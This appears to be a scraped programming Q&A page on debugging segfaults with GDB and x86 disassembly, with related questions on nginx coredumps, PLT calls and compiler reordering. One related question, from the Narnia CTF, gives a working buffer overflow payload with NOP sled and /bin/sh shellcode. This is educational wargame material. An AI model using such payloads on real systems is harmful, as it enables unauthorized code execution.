Segmentation fault in assembly code + C - c

I am trying to debug a segmentation fault in my assembly code. Here is the GDB output
Program received signal SIGSEGV, Segmentation fault.
0x0000000000424c50 in restore_context()
(gdb) disassemble restore_context
Dump of assembler code for function restore_context:
0x0000000000424c44 <+0>: mov 0x8(%rsp),%rax
0x0000000000424c49 <+5>: mov 0x38(%rax),%rsp
0x0000000000424c4d <+9>: mov (%rax),%rdx
=>0x0000000000424c50 <+12>: mov %rdx,(%rsp)
0x0000000000424c54 <+16>: mov 0x18(%rax),%rbx
0x0000000000424c58 <+20>: mov 0x20(%rax),%rsi
0x0000000000424c5c <+24>: mov 0x28(%rax),%rdi
0x0000000000424c60 <+28>: mov 0x30(%rax),%rbp
0x0000000000424c64 <+32>: xor %rax,%rax
0x0000000000424c67 <+35>: retq
End of assembler dump.
By the little research I did , this looks like a over flow error. Can someone tell me how to debug this ? How to find this memory leak. Do we have some tool to inspect this or is their an error with my assembly code. Need help debugging this.
Here is the assembly code as well
.align 4,0x90
.global restore_context
.type restore_context,#function
restore_context:
mov 8(%rsp),%rax
mov 56(%rax), %rsp
mov 0(%rax),%rdx /* Fetch our return address */
mov %rdx, 0(%rsp) /* Save our return address */ // overflow
mov 24(%rax),%rbx
mov 32(%rax), %rsi
mov 40(%rax), %rdi
mov 48(%rax), %rbp
xor %rax,%rax
ret
This is the counterpart store_context()
.align 4,0x90
.global store_context
.type store_context,#function
store_context:
mov 8(%rsp),%rax
mov %rbx, 24(%rax)
mov %rsi, 32(%rax)
mov %rdi, 40(%rax)
mov %rbp, 48(%rax)
mov %rsp, 56(%rax)
mov 0(%rsp), %rdx
mov %rdx, 0(%rax)
xor %rax,%rax
inc %rax
ret

Related

Buffer Overflow strcpy() example from CTF

I come back (yet again) to basic buffer explotation CTFs and I have the following vulnerable program of Narnia CTF from Overthewire:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char * argv[]){
char buf[128];
if(argc == 1){
printf("Usage: %s argument\n", argv[0]);
exit(1);
}
strcpy(buf,argv[1]);
printf("%s", buf);
return 0;
}
I see that by "A" * 132, there is a segfault.
Anything less, the program is executed normally.
Dumping main in gdb gives:
0x0804844b <+0>: push %ebp
0x0804844c <+1>: mov %esp,%ebp
0x0804844e <+3>: add $0xffffff80,%esp
0x08048451 <+6>: cmpl $0x1,0x8(%ebp)
0x08048455 <+10>: jne 0x8048471 <main+38>
0x08048457 <+12>: mov 0xc(%ebp),%eax
0x0804845a <+15>: mov (%eax),%eax
0x0804845c <+17>: push %eax
0x0804845d <+18>: push $0x8048520
0x08048462 <+23>: call 0x8048300 <printf#plt>
0x08048467 <+28>: add $0x8,%esp
0x0804846a <+31>: push $0x1
0x0804846c <+33>: call 0x8048320 <exit#plt>
0x08048471 <+38>: mov 0xc(%ebp),%eax
0x08048474 <+41>: add $0x4,%eax
0x08048477 <+44>: mov (%eax),%eax
0x08048479 <+46>: push %eax
0x0804847a <+47>: lea -0x80(%ebp),%eax
0x0804847d <+50>: push %eax
0x0804847e <+51>: call 0x8048310 <strcpy#plt>
0x08048483 <+56>: add $0x8,%esp
0x08048486 <+59>: lea -0x80(%ebp),%eax
0x08048489 <+62>: push %eax
0x0804848a <+63>: push $0x8048534
0x0804848f <+68>: call 0x8048300 <printf#plt>
0x08048494 <+73>: add $0x8,%esp
0x08048497 <+76>: mov $0x0,%eax
0x0804849c <+81>: leave
0x0804849d <+82>: ret
My idea is to take control over the instruction pointer and make it poit to my shellcode. There is no stack canary.
With gbd, I set up a breakpoint at *0x0804849c and see the EIP address before returning is 0x804849c.
(gdb) i r
eax 0x0 0
ecx 0x7fffffe6 2147483622
edx 0xf7fc6870 -134453136
ebx 0x0 0
esp 0xffffd628 0xffffd628
ebp 0xffffd6a8 0xffffd6a8
esi 0x2 2
edi 0xf7fc5000 -134459392
eip 0x804849c 0x804849c <main+81>
When overflowing with "A" * 132 and run the program again, and then stepping over the breakpoint, I see EBP is filled with "A"s.
(gdb) i r
eax 0x0 0
ecx 0x7fffff7b 2147483515
edx 0xf7fc6870 -134453136
ebx 0x0 0
esp 0xffffd640 0xffffd640
ebp 0x41414141 0x41414141
When running again with extra bytes (136 in total), I see I am able to take control over EIP.
(gdb) i r
eax 0x0 0
ecx 0x7fffff7b 2147483515
edx 0xf7fc6870 -134453136
ebx 0x0 0
esp 0xffffd640 0xffffd640
ebp 0x41414141 0x41414141
-----> 0x41414141 in ?? ()
So, I craft my payload as follows:
buffer points to nops
[PADDING] + ] [ EIP + 4 ] + [ NOP SLED ] + [ SHELLCODE ]
AAAAAA.. \x0c\xd6\xff\xff \X90 * 48 + n length shellcode
`python -c "print('A' * 132 + '\x0c\xd6\xff\xff' + '\x90'*48 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80')"`
My questions are:
I noticed that I had to arbitrarly increment the NOP sled in order for this to work. For example, the payload worked in gdb with as little as 10 NOPs, and in the shell, specifically 48 were needed. What is the reason for this?
I also noticed that depending on the shellcode length, there were more or less NOPs needed. For example, the following payload worked with exactly 78 NOPs outside of gdb:
./narnia2 `python -c "print('A' * 132 + '\x0c\xd6\xff\xff' + '**\x90'*100** + '\x99\xf7\xe2\x8d\x08\xbe\x2f\x2f\x73\x68\xbf\x2f\x62\x69\x6e\x51\x56\x57\x8d\x1c\x24\xb0\x0b\xcd\x80')"`
Anything less returns SIGILL, Illegal instruction.
Meanwhile, on GDB, that same payload only took 30 NOPs
Another question is, why are NOPs necessary? If I provide payload with no nops and inspect the instructions after leave, I see:
0xffffd60c in ?? () (the address in our payload, where we pointed eip to)
(gdb) x/20i 0xffffd60c
=> 0xffffd60c: inc %ecx
0xffffd60d: inc %ecx
0xffffd60e: inc %ecx
0xffffd60f: inc %ecx
0xffffd610: inc %ecx
0xffffd611: inc %ecx
0xffffd612: inc %ecx
0xffffd613: inc %ecx
0xffffd614: inc %ecx
0xffffd615: inc %ecx
0xffffd616: inc %ecx
...
0xffffd61e: (bad)
If I, however, specify the NOPs and run the program again:
(gdb) x/20i 0xffffd60c
=> 0xffffd60c: nop
0xffffd60d: nop
0xffffd60e: nop
0xffffd60f: nop
0xffffd610: nop
0xffffd611: nop
0xffffd612: nop
0xffffd613: nop
0xffffd614: nop
0xffffd615: nop
0xffffd616: nop
0xffffd617: nop
0xffffd618: nop
0xffffd619: nop
0xffffd61a: nop
0xffffd61b: nop
0xffffd61c: nop
0xffffd61d: nop
0xffffd61e: nop
0xffffd61f: nop
(gdb)
0xffffd620: cltd This is the shellcode!
0xffffd621: mul %edx
0xffffd623: lea (%eax),%ecx
0xffffd625: mov $0x68732f2f,%esi
0xffffd62a: mov $0x6e69622f,%edi
0xffffd62f: push %ecx
0xffffd630: push %esi
0xffffd631: push %edi
0xffffd632: lea (%esp),%ebx
0xffffd635: mov $0xb,%al
0xffffd637: int $0x80
: Shellcode in question :
Finally, I was looking if there was an actual way of switching the payload order. Specifically, what if the payload looks like:
[PADDING NOP SLED - SHELLCODE.LEN ] + SHELLCODE + EIP
EIP points to the start of the buffer, so it points to our NOP SLED, and eventually executes the shellcode. Is this possible?
I noticed the buffer starts at 0xffffd618. The payload becomes:
#~: ./narnia2 `python -c "print('\x90'*107 + '\x99\xf7\xe2\x8d\x08\xbe\x2f\x2f\x73\x68\xbf\x2f\x62\x69\x6e\x51\x56\x57\x8d\x1c\x24\xb0\x0b\xcd\x80' + '\x18\xd6\xff\xff')"`
Inspecting in GDB,
(gdb) x/20i 0xffffd618
=> 0xffffd618: nop
0xffffd619: nop
0xffffd61a: nop
0xffffd61b: nop
0xffffd61c: nop
0xffffd61d: nop
0xffffd61e: nop
0xffffd61f: nop
0xffffd620: nop
0xffffd621: nop
0xffffd622: nop
0xffffd623: cltd That's the shellcode again!
0xffffd624: mul %edx
0xffffd626: lea (%eax),%ecx
0xffffd628: mov $0x68732f2f,%esi
0xffffd62d: mov $0x6e69622f,%edi
0xffffd632: push %ecx
0xffffd633: push %esi
0xffffd634: push %edi
0xffffd635: lea (%esp),%ebx
(gdb)
0xffffd638: mov $0xb,%al
0xffffd63a: int $0x80
0xffffd63c: sbb %dl,%dh
0xffffd63e: (bad) uh oh
The program eventually segfaults, specifically, at 0xffffd635. What is the reason for this?

coredump when call another funciton

our nginx server coredump with a relatively low probability after we modified some codes, it coredump when call another function. i'm not sure what direct reason is, for example: nginx tried to read/write a wrong memory, but what is the exact wrong address and how to find out?
here is the last 8 frames.
(gdb) bt
#0 0x00000000004e9bb8 in ngx_http_trailers_filter (r=0x1128e350, in=0x7ffe64678c60)
at src/http/modules/ngx_http_headers_filter_module.c:264
#1 0x0000000000539754 in ngx_http_jflv_body_filter (r=0x1128e350, in=0x7ffe64678c60) at addon/jflv/ngx_http_jflv_module.c:263
#2 0x000000000053c931 in ngx_http_jbilling_body_filter (r=0x1128e350, in=0x7ffe64678c60)
at addon/jbilling/ngx_http_jbilling_module.c:2192
#3 0x000000000053fef1 in ngx_http_jbilling_body_filter (r=0x1128e350, in=0x7ffe64678c60)
at addon/thirdparty_billing/ngx_http_thirdparty_billing_module.c:2111
#4 0x0000000000549690 in ngx_http_sub_grep_body_filter (r=0x1128e350, in=0x7ffe64678c60)
at addon/sub_grep_filter/ngx_http_sub_grep_filter_module.c:299
#5 0x000000000052cd5f in ngx_http_upstream_jconhash_body_filter (r=0x1128e350, chain=0x7ffe64678c60)
at addon/upstream_jconhash/ngx_http_upstream_jconhash_module.c:1664
#6 0x00000000005310c3 in ngx_http_upstream_lb_chash_body_filter (r=0x1128e350, chain=0x7ffe64678c60)
at addon/upstream_lb_chash/chash/ngx_http_upstream_lb_chash_module.c:993
#7 0x000000000053cc93 in ngx_http_file_signature_body_filter (r=0x1128e350, in=0x7ffe64678c60)
at addon/file_signature_filter/ngx_http_file_signature_filter_module.c:203
#8 0x000000000054b1a8 in ngx_http_trim_body_filter (r=0x1128e350, in=<optimized out>)
at addon/jtrim/ngx_http_trim_filter_module.c:365
the codes near src/http/modules/ngx_http_headers_filter_module.c:264
static ngx_int_t
ngx_http_trailers_filter(ngx_http_request_t *r, ngx_chain_t *in)
{
ngx_str_t value;
ngx_uint_t i, safe_status;
ngx_chain_t *cl;
ngx_table_elt_t *t;
ngx_http_header_val_t *h;
ngx_http_headers_conf_t *conf;
conf = ngx_http_get_module_loc_conf(r, ngx_http_headers_filter_module);
if (in == NULL
|| conf->trailers == NULL
|| !r->expect_trailers
|| r->header_only)
{
return ngx_http_next_body_filter(r, in); <== coredump here
}
...
}
i also disassemble the last frame code
(gdb) disassemble
Dump of assembler code for function ngx_http_trailers_filter:
0x00000000004e9aeb <+0>: push %r15
0x00000000004e9aed <+2>: push %r14
0x00000000004e9aef <+4>: push %r13
0x00000000004e9af1 <+6>: push %r12
0x00000000004e9af3 <+8>: push %rbp
0x00000000004e9af4 <+9>: push %rbx
0x00000000004e9af5 <+10>: sub $0x28,%rsp
0x00000000004e9af9 <+14>: mov %rdi,%r12
0x00000000004e9afc <+17>: mov %rsi,%r15
0x00000000004e9aff <+20>: mov 0x28(%rdi),%rax
0x00000000004e9b03 <+24>: mov 0x5e5ed6(%rip),%rdx # 0xacf9e0 <ngx_http_headers_filter_module>
0x00000000004e9b0a <+31>: lea (%rax,%rdx,8),%rax
0x00000000004e9b0e <+35>: test %rsi,%rsi
0x00000000004e9b11 <+38>: je 0x4e9bac <ngx_http_trailers_filter+193>
0x00000000004e9b17 <+44>: mov (%rax),%r14
0x00000000004e9b1a <+47>: mov 0x20(%r14),%rcx
0x00000000004e9b1e <+51>: test %rcx,%rcx
0x00000000004e9b21 <+54>: je 0x4e9bac <ngx_http_trailers_filter+193>
0x00000000004e9b27 <+60>: movzbl 0x511(%rdi),%eax
0x00000000004e9b2e <+67>: and $0xffffffc0,%eax
0x00000000004e9b31 <+70>: cmp $0x80,%al
0x00000000004e9b33 <+72>: jne 0x4e9bac <ngx_http_trailers_filter+193>
0x00000000004e9b35 <+74>: mov (%rsi),%rax
0x00000000004e9b38 <+77>: cmpb $0x0,0x48(%rax)
0x00000000004e9b3c <+81>: js 0x4e9b57 <ngx_http_trailers_filter+108>
0x00000000004e9b3e <+83>: mov %rsi,%rax
0x00000000004e9b41 <+86>: mov 0x8(%rax),%rax
--Type <RET> for more, q to quit, c to continue without paging--
0x00000000004e9b45 <+90>: test %rax,%rax
0x00000000004e9b48 <+93>: je 0x4e9c6d <ngx_http_trailers_filter+386>
0x00000000004e9b4e <+99>: mov (%rax),%rdx
0x00000000004e9b51 <+102>: cmpb $0x0,0x48(%rdx)
0x00000000004e9b55 <+106>: jns 0x4e9b41 <ngx_http_trailers_filter+86>
0x00000000004e9b57 <+108>: mov 0x268(%r12),%rax
0x00000000004e9b5f <+116>: cmp $0xce,%rax
0x00000000004e9b65 <+122>: je 0x4e9bc7 <ngx_http_trailers_filter+220>
0x00000000004e9b67 <+124>: ja 0x4e9c7e <ngx_http_trailers_filter+403>
0x00000000004e9b6d <+130>: mov $0x0,%r13d
0x00000000004e9b73 <+136>: cmp $0xc8,%rax
0x00000000004e9b79 <+142>: jb 0x4e9b97 <ngx_http_trailers_filter+172>
0x00000000004e9b7b <+144>: mov $0x1,%r13d
0x00000000004e9b81 <+150>: cmp $0xc9,%rax
0x00000000004e9b87 <+156>: jbe 0x4e9b97 <ngx_http_trailers_filter+172>
0x00000000004e9b89 <+158>: cmp $0xcc,%rax
0x00000000004e9b8f <+164>: sete %r13b
0x00000000004e9b93 <+168>: movzbl %r13b,%r13d
0x00000000004e9b97 <+172>: mov (%rcx),%rbx
0x00000000004e9b9a <+175>: cmpq $0x0,0x8(%rcx)
0x00000000004e9b9f <+180>: je 0x4e9c44 <ngx_http_trailers_filter+345>
0x00000000004e9ba5 <+186>: mov $0x0,%ebp
0x00000000004e9baa <+191>: jmp 0x4e9c03 <ngx_http_trailers_filter+280>
0x00000000004e9bac <+193>: mov %r15,%rsi
0x00000000004e9baf <+196>: mov %r12,%rdi
0x00000000004e9bb2 <+199>: callq *0x62aa70(%rip) # 0xb14628 <ngx_http_next_body_filter>
=> 0x00000000004e9bb8 <+205>: add $0x28,%rsp
0x00000000004e9bbc <+209>: pop %rbx
--Type <RET> for more, q to quit, c to continue without paging--
0x00000000004e9bbd <+210>: pop %rbp
0x00000000004e9bbe <+211>: pop %r12
0x00000000004e9bc0 <+213>: pop %r13
0x00000000004e9bc2 <+215>: pop %r14
0x00000000004e9bc4 <+217>: pop %r15
0x00000000004e9bc6 <+219>: retq
0x00000000004e9bc7 <+220>: mov $0x1,%r13d
rip point to 0x00000000004e9bb8, so the current executing instruction should be 0x00000000004e9bb2 callq *0x62aa70(%rip), i have searched some docs for what callq instruction is(eg: https://web.stanford.edu/class/archive/cs/cs107/cs107.1186/guide/x86-64.html), in the docs, it says:
The callq instruction takes one operand, the address of the function being called. It pushes the return address (current value of %rip, which is the next instruction after the call) onto the stack and then jumps to the address of the function being called.
it seems it only push ret addresss to stack and change the rip to the address of the function being called, it shouldn't make process coredump normally.
i also suspect another possibility: it actually coredump when ngx_http_next_body_filter execute retq.
because 0x00000000004e9bac(mov %r15,%rsi) and 0x00000000004e9baf(mov %r12,%rdi) have just executed before coredump, so %15 and %rsi should be same(the in param in src code), %r12 and %rdi should be same too(the r param in src code), but the actual info in registers is not the value we expected
(gdb) i r
rax 0x0 0
rbx 0x1128e350 287892304
rcx 0x1128e300 287892224
rdx 0x0 0
rsi 0x0 0
rdi 0xbe 190
rbp 0x0 0x0
rsp 0x7ffe64678700 0x7ffe64678700
r8 0xbe 190
r9 0x7ffe64677ec0 140730582924992
r10 0x10d7f170 282587504
r11 0x246 582
r12 0x1128e350 287892304
r13 0x7ffe64678c60 140730582928480
r14 0x3148b28 51677992
r15 0x7ffe64678c60 140730582928480
rip 0x4e9bb8 0x4e9bb8 <ngx_http_trailers_filter+205>
eflags 0x10202 [ IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
so maybe the rsi and rdi have been modified by ngx_http_next_body_filter, and it actually coredump when ngx_http_next_body_filter execute retq, is it possible?
is there some advices to anylyse this question?
i also have other questions:
normally, what kinds of codes would coredump when call another function.
is there some docs explain similar situation

disassemble code for 2 formats of printfs

I am trying to understand reasoning for seg fault with dissemble code.
Case 1.
char *p = NULL;
printf("%s", p);
O/p: No crash. it give me null. Further looking at disassemble code, it shows this one.
Dump of assembler code for function printf#plt:
0x00000000004003b8 <+0>: jmpq *0x2004aa(%rip) # 0x600868 <printf#got.plt>
0x00000000004003be <+6>: pushq $0x0
0x00000000004003c3 <+11>: jmpq 0x4003a8
End of assembler dump.
While i am trying to further go beyond this but do not know how to move to next set of instructions and what exactly it does.
Case 2.
int
main()
{
char *p = NULL;
printf("%s\n", p);
}
It leads to seg fault.
Disassemble code:
Dump of assembler code for function main:
0x00000000004004c4 <+0>: push %rbp
0x00000000004004c5 <+1>: mov %rsp,%rbp
0x00000000004004c8 <+4>: sub $0x10,%rsp
0x00000000004004cc <+8>: movq $0x0,-0x8(%rbp)
0x00000000004004d4 <+16>: mov -0x8(%rbp),%rax
0x00000000004004d8 <+20>: mov %rax,%rdi
0x00000000004004db <+23>: callq 0x4003b8 <puts#plt>
0x00000000004004e0 <+28>: leaveq
0x00000000004004e1 <+29>: retq
End of assembler dump.
(gdb) disassemble puts
Dump of assembler code for function puts#plt:
0x00000000004003b8 <+0>: jmpq *0x2004aa(%rip) # 0x600868 <puts#got.plt>
0x00000000004003be <+6>: pushq $0x0
0x00000000004003c3 <+11>: jmpq 0x4003a8
End of assembler dump.
Can u please help me to identify what assembler instruction is leading to seg fault?
0x00000000004003b8 <+0>: jmpq *0x2004aa(%rip) # 0x600868 <puts#got.plt>
Two important codewords here:
GOT -> Global Offset Table
PLT -> Procedure Linkage Table
This indicates it calls puts from dynamic library. Address of puts is not know at disassembly only time. Program must be run in order to allow dynamic linker bind address of library function to PLT slot.
What you need is:
(gdb) start
Temporary breakpoint 1 at 0x40053e: file c.c, line 9.
Starting program: /home/josef/DEVEL/test/test/a.out
Temporary breakpoint 1, main () at c.c:9
9 char *p = NULL;
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400536 <+0>: push %rbp
0x0000000000400537 <+1>: mov %rsp,%rbp
0x000000000040053a <+4>: sub $0x10,%rsp
=> 0x000000000040053e <+8>: movq $0x0,-0x8(%rbp)
0x0000000000400546 <+16>: mov -0x8(%rbp),%rax
0x000000000040054a <+20>: mov %rax,%rdi
0x000000000040054d <+23>: callq 0x400410 <puts#plt>
0x0000000000400552 <+28>: leaveq
0x0000000000400553 <+29>: retq
End of assembler dump.
(gdb) disassemble puts
Dump of assembler code for function _IO_puts:
0x00007ffff7a84d60 <+0>: push %r12
0x00007ffff7a84d62 <+2>: mov %rdi,%r12
0x00007ffff7a84d65 <+5>: push %rbp
0x00007ffff7a84d66 <+6>: push %rbx
0x00007ffff7a84d67 <+7>: callq 0x7ffff7a9d9b0 <strlen>
0x00007ffff7a84d6c <+12>: mov 0x34fafd(%rip),%rbx # 0x7ffff7dd4870 <stdout>
0x00007ffff7a84d73 <+19>: mov %rax,%rbp
0x00007ffff7a84d76 <+22>: mov (%rbx),%eax
0x00007ffff7a84d78 <+24>: mov %rbx,%rdi
0x00007ffff7a84d7b <+27>: and $0x8000,%eax
0x00007ffff7a84d80 <+32>: jne 0x7ffff7a84ddf <_IO_puts+127>
0x00007ffff7a84d82 <+34>: mov 0x88(%rbx),%r8
......
Now you see what is inside puts. You can go forward and disassemble strlen
(gdb) disassemble strlen
Dump of assembler code for function strlen:
0x00007ffff7a9d9b0 <+0>: pxor %xmm8,%xmm8
0x00007ffff7a9d9b5 <+5>: pxor %xmm9,%xmm9
0x00007ffff7a9d9ba <+10>: pxor %xmm10,%xmm10
0x00007ffff7a9d9bf <+15>: pxor %xmm11,%xmm11
0x00007ffff7a9d9c4 <+20>: mov %rdi,%rax
0x00007ffff7a9d9c7 <+23>: mov %rdi,%rcx
0x00007ffff7a9d9ca <+26>: and $0xfff,%rcx
0x00007ffff7a9d9d1 <+33>: cmp $0xfcf,%rcx
0x00007ffff7a9d9d8 <+40>: ja 0x7ffff7a9da40 <strlen+144>
0x00007ffff7a9d9da <+42>: movdqu (%rax),%xmm12
0x00007ffff7a9d9df <+47>: pcmpeqb %xmm8,%xmm12
0x00007ffff7a9d9e4 <+52>: pmovmskb %xmm12,%edx
0x00007ffff7a9d9e9 <+57>: test %edx,%edx
0x00007ffff7a9d9eb <+59>: je 0x7ffff7a9d9f1 <strlen+65>
......
Good luck with analyzing all the code :)

printf and gets not showing in assembler code

I just got started with buffer overflows and when I look for tutorials everyone has printf#plt and gets#plt in their assembler code, but I don't see them. Am I doing something wrong?
Source code:
#include <stdio.h>
#include <string.h>
int main()
{
char password[16];
int passcheck = 0;
void secret();
printf("\nWhat's the password?\n");
gets(password);
if (strcmp(password, "password1"))
{
printf("\nYou fail/n");
}
else
{
printf("\nCorrect password\n");
passcheck = 1;
}
if(passcheck)
{
secret();
}
return 0;
}
void secret()
{
printf("\nYou got it!!!\n");
}
assembler code:
0x00001e50 <+0>: push %ebp
0x00001e51 <+1>: mov %esp,%ebp
0x00001e53 <+3>: push %edi
0x00001e54 <+4>: push %esi
0x00001e55 <+5>: sub $0x40,%esp
0x00001e58 <+8>: call 0x1e5d <main+13>
0x00001e5d <+13>: pop %eax
0x00001e5e <+14>: lea 0x101(%eax),%ecx
0x00001e64 <+20>: movl $0x0,-0xc(%ebp)
0x00001e6b <+27>: movl $0x0,-0x20(%ebp)
0x00001e72 <+34>: mov %ecx,(%esp)
0x00001e75 <+37>: mov %eax,-0x24(%ebp)
0x00001e78 <+40>: call 0x1f28
0x00001e7d <+45>: lea -0x1c(%ebp),%ecx
0x00001e80 <+48>: mov %ecx,(%esp)
0x00001e83 <+51>: mov %eax,-0x28(%ebp)
0x00001e86 <+54>: call 0x1f22
0x00001e8b <+59>: lea -0x1c(%ebp),%ecx
0x00001e8e <+62>: mov -0x24(%ebp),%edx
0x00001e91 <+65>: lea 0x118(%edx),%esi
0x00001e97 <+71>: mov %esp,%edi
0x00001e99 <+73>: mov %esi,0x4(%edi)
0x00001e9c <+76>: mov %ecx,(%edi)
0x00001e9e <+78>: mov %eax,-0x2c(%ebp)
0x00001ea1 <+81>: call 0x1f2e
0x00001ea6 <+86>: cmp $0x0,%eax
0x00001ea9 <+89>: je 0x1ec8 <main+120>
0x00001eaf <+95>: mov -0x24(%ebp),%eax
0x00001eb2 <+98>: lea 0x122(%eax),%ecx
0x00001eb8 <+104>: mov %ecx,(%esp)
0x00001ebb <+107>: call 0x1f28
0x00001ec0 <+112>: mov %eax,-0x30(%ebp)
0x00001ec3 <+115>: jmp 0x1ee3 <main+147>
0x00001ec8 <+120>: mov -0x24(%ebp),%eax
0x00001ecb <+123>: lea 0x12e(%eax),%ecx
0x00001ed1 <+129>: mov %ecx,(%esp)
0x00001ed4 <+132>: call 0x1f28
0x00001ed9 <+137>: movl $0x1,-0x20(%ebp)
0x00001ee0 <+144>: mov %eax,-0x34(%ebp)
0x00001ee3 <+147>: cmpl $0x0,-0x20(%ebp)
0x00001ee7 <+151>: je 0x1ef2 <main+162>
0x00001eed <+157>: call 0x1f00 <secret>
0x00001ef2 <+162>: xor %eax,%eax
0x00001ef4 <+164>: add $0x40,%esp
0x00001ef7 <+167>: pop %esi
0x00001ef8 <+168>: pop %edi
0x00001ef9 <+169>: pop %ebp
0x00001efa <+170>: ret
0x00001efb <+171>: nopl 0x0(%eax,%eax,1)
Add debug symbols to your binaries by compiling your C program with appropriate switch for your C compiler. For example if you use gcc, use -g switch as is described here:. After that you will be able to see original C symbols names when executing your binary under gdb
Regarding your comment - maybe your object files weren't recompiled from scratch. Try to make clean if you use makefiles or just delete all the object (.o) files and then recompile your program with -ggdb switch (it is the same as -g switch but generates debug info specifically for gdb). After recompiling look in your binary for debug infor - couple of strings like 'printf#plt' and 'gets#plt'.

Is there a way to tell GCC not to reorder any instructions, not just load/stores?

I'm working on the irq_lock() / irq_unlock() implementation for an RTOS and found an issue. We want to absolutely minimize how much time the CPU spends with interrupts locked. Right now, our irq_lock() inline function for x86 uses "memory" clobber:
static ALWAYS_INLINE unsigned int _do_irq_lock(void)
{
unsigned int key;
__asm__ volatile (
"pushfl;\n\t"
"cli;\n\t"
"popl %0;\n\t"
: "=g" (key)
:
: "memory"
);
return key;
}
The problem is that the compiler will still reorder potentially expensive operations into the critical section if they just touch registers and not memory. A specific example is here in our kernel's sleep function:
void k_sleep(int32_t duration)
{
__ASSERT(!_is_in_isr(), "");
__ASSERT(duration != K_FOREVER, "");
K_DEBUG("thread %p for %d ns\n", _current, duration);
/* wait of 0 ns is treated as a 'yield' */
if (duration == 0) {
k_yield();
return;
}
int32_t ticks = _TICK_ALIGN + _ms_to_ticks(duration);
int key = irq_lock();
_remove_thread_from_ready_q(_current);
_add_thread_timeout(_current, NULL, ticks);
_Swap(key);
}
The 'ticks' calculation, which does expensive math, gets reordered inside where we lock interrupts, so we are calling __divdi3 with interrupts locked which is not what we want:
Dump of assembler code for function k_sleep:
0x0010197a <+0>: push %ebp
0x0010197b <+1>: mov %esp,%ebp
0x0010197d <+3>: push %edi
0x0010197e <+4>: push %esi
0x0010197f <+5>: push %ebx
0x00101980 <+6>: mov 0x8(%ebp),%edi
0x00101983 <+9>: test %edi,%edi
0x00101985 <+11>: jne 0x101993 <k_sleep+25>
0x00101987 <+13>: lea -0xc(%ebp),%esp
0x0010198a <+16>: pop %ebx
0x0010198b <+17>: pop %esi
0x0010198c <+18>: pop %edi
0x0010198d <+19>: pop %ebp
0x0010198e <+20>: jmp 0x101944 <k_yield>
0x00101993 <+25>: pushf
0x00101994 <+26>: cli
0x00101995 <+27>: pop %esi
0x00101996 <+28>: pushl 0x104608
0x0010199c <+34>: call 0x101726 <_remove_thread_from_ready_q>
0x001019a1 <+39>: mov $0x64,%eax
0x001019a6 <+44>: imul %edi
0x001019a8 <+46>: mov 0x104608,%ebx
0x001019ae <+52>: add $0x3e7,%eax
0x001019b3 <+57>: adc $0x0,%edx
0x001019b6 <+60>: mov %ebx,0x20(%ebx)
0x001019b9 <+63>: movl $0x0,(%esp)
0x001019c0 <+70>: push $0x3e8
0x001019c5 <+75>: push %edx
0x001019c6 <+76>: push %eax
0x001019c7 <+77>: call 0x1000a0 <__divdi3>
0x001019cc <+82>: add $0x10,%esp
0x001019cf <+85>: inc %eax
0x001019d0 <+86>: mov %eax,0x28(%ebx)
0x001019d3 <+89>: movl $0x0,0x24(%ebx)
0x001019da <+96>: lea 0x18(%ebx),%edx
0x001019dd <+99>: mov $0x10460c,%eax
0x001019e2 <+104>: add $0x28,%ebx
0x001019e5 <+107>: mov $0x10162b,%ecx
0x001019ea <+112>: push %ebx
0x001019eb <+113>: call 0x101667 <sys_dlist_insert_at>
0x001019f0 <+118>: mov %esi,0x8(%ebp)
0x001019f3 <+121>: pop %eax
0x001019f4 <+122>: lea -0xc(%ebp),%esp
0x001019f7 <+125>: pop %ebx
0x001019f8 <+126>: pop %esi
0x001019f9 <+127>: pop %edi
0x001019fa <+128>: pop %ebp
0x001019fb <+129>: jmp 0x100f77 <_Swap>
End of assembler dump.
We discovered that we can get the ordering we want by declaring 'ticks' volatile:
Dump of assembler code for function k_sleep:
0x0010197a <+0>: push %ebp
0x0010197b <+1>: mov %esp,%ebp
0x0010197d <+3>: push %ebx
0x0010197e <+4>: push %edx
0x0010197f <+5>: mov 0x8(%ebp),%edx
0x00101982 <+8>: test %edx,%edx
0x00101984 <+10>: jne 0x10198d <k_sleep+19>
0x00101986 <+12>: call 0x101944 <k_yield>
0x0010198b <+17>: jmp 0x1019f5 <k_sleep+123>
0x0010198d <+19>: mov $0x64,%eax
0x00101992 <+24>: push $0x0
0x00101994 <+26>: imul %edx
0x00101996 <+28>: add $0x3e7,%eax
0x0010199b <+33>: push $0x3e8
0x001019a0 <+38>: adc $0x0,%edx
0x001019a3 <+41>: push %edx
0x001019a4 <+42>: push %eax
0x001019a5 <+43>: call 0x1000a0 <__divdi3>
0x001019aa <+48>: add $0x10,%esp
0x001019ad <+51>: inc %eax
0x001019ae <+52>: mov %eax,-0x8(%ebp)
0x001019b1 <+55>: pushf
0x001019b2 <+56>: cli
0x001019b3 <+57>: pop %ebx
0x001019b4 <+58>: pushl 0x1045e8
0x001019ba <+64>: call 0x101726 <_remove_thread_from_ready_q>
0x001019bf <+69>: mov 0x1045e8,%eax
0x001019c4 <+74>: mov -0x8(%ebp),%edx
0x001019c7 <+77>: movl $0x0,0x24(%eax)
0x001019ce <+84>: mov %edx,0x28(%eax)
0x001019d1 <+87>: mov %eax,0x20(%eax)
0x001019d4 <+90>: lea 0x18(%eax),%edx
0x001019d7 <+93>: add $0x28,%eax
0x001019da <+96>: mov %eax,(%esp)
0x001019dd <+99>: mov $0x10162b,%ecx
0x001019e2 <+104>: mov $0x1045ec,%eax
0x001019e7 <+109>: call 0x101667 <sys_dlist_insert_at>
0x001019ec <+114>: mov %ebx,(%esp)
0x001019ef <+117>: call 0x100f77 <_Swap>
0x001019f4 <+122>: pop %eax
0x001019f5 <+123>: mov -0x4(%ebp),%ebx
0x001019f8 <+126>: leave
0x001019f9 <+127>: ret
End of assembler dump.
However this just fixes it in one spot. We really need a way to modify the irq_lock() implementation such that it does the right thing everywhere, and right now the "memory" clobber is not sufficient.
Since your architecture is x86 anyway, try using __sync_synchronize instead of the memory clobber. It's a full hardware memory barrier supported by x86.

Resources